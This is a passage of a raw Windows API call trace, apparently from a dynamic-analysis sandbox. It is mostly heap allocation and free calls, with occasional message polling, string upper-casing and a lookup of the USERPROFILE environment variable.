HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0211.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.034] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.034] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.035] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.035] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0211.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.037] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.037] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0211.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0211.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0211.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.040] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0211.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0211.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 